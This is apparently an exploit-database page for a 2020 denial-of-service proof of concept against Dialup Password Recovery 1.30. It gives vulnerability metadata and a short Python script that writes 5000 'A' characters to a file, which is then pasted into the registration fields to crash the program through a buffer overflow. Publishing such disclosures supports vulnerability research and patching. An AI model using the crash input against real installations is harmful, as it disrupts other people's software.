header-logo
Suggest Exploit
vendor:
Dialup Password Recovery
by:
Antonio de la Piedra
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Dialup Password Recovery
Affected Version From: 1.30
Affected Version To: 1.30
Patch Exists: NO
Related CWE: N/A
CPE: a:top_password_software:dialup_password_recovery:1.30
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 32-bit
2020

Top Password Software Dialup Password Recovery 1.30 – Denial of Service (PoC)

When the contents of poc.txt are copied and pasted into the User Name / Registration Code input fields, the application crashes due to a buffer overflow.

Mitigation:

Input validation should be used to prevent buffer overflows.
Source

Exploit-DB raw data:

# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
# Version: 1.30
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the
# User Name /  Registration Code input fields.

#!/usr/bin/python

poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()

Navigation

Suggest Exploit

Services By CQR